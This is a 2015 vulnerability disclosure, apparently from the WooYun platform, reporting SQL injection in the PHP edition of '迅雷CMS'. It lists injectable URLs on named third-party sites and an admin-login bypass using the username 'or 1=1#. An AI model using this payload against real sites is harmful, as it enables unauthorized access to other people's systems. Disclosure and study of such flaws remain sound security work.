漏洞概要
关注数(24)
关注此漏洞
漏洞标题:迅雷CMS#PHP版 两处Get注入+Post注入
漏洞作者: 浅蓝
提交时间:2015-03-31 15:27
修复时间:2015-05-15 15:28
公开时间:2015-05-15 15:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-03-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
如题
详细说明:
迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2
# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台
账号'or 1=1# 密码随意
漏洞证明:
迅雷cms精选案例
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ 这是个php版的
http://www.ycgjgs.com//news.php?id=475 注入点1
http://www.ycgjgs.com//qynews.php?type=8 注入点2
# 后台登陆处参数未过滤可绕过登录
http://www.ycgjgs.com//admincm/ 后台
账号'or 1=1# 密码随意
修复方案:
版权声明:转载请注明来源 浅蓝@乌云
漏洞回应
漏洞评价:
评论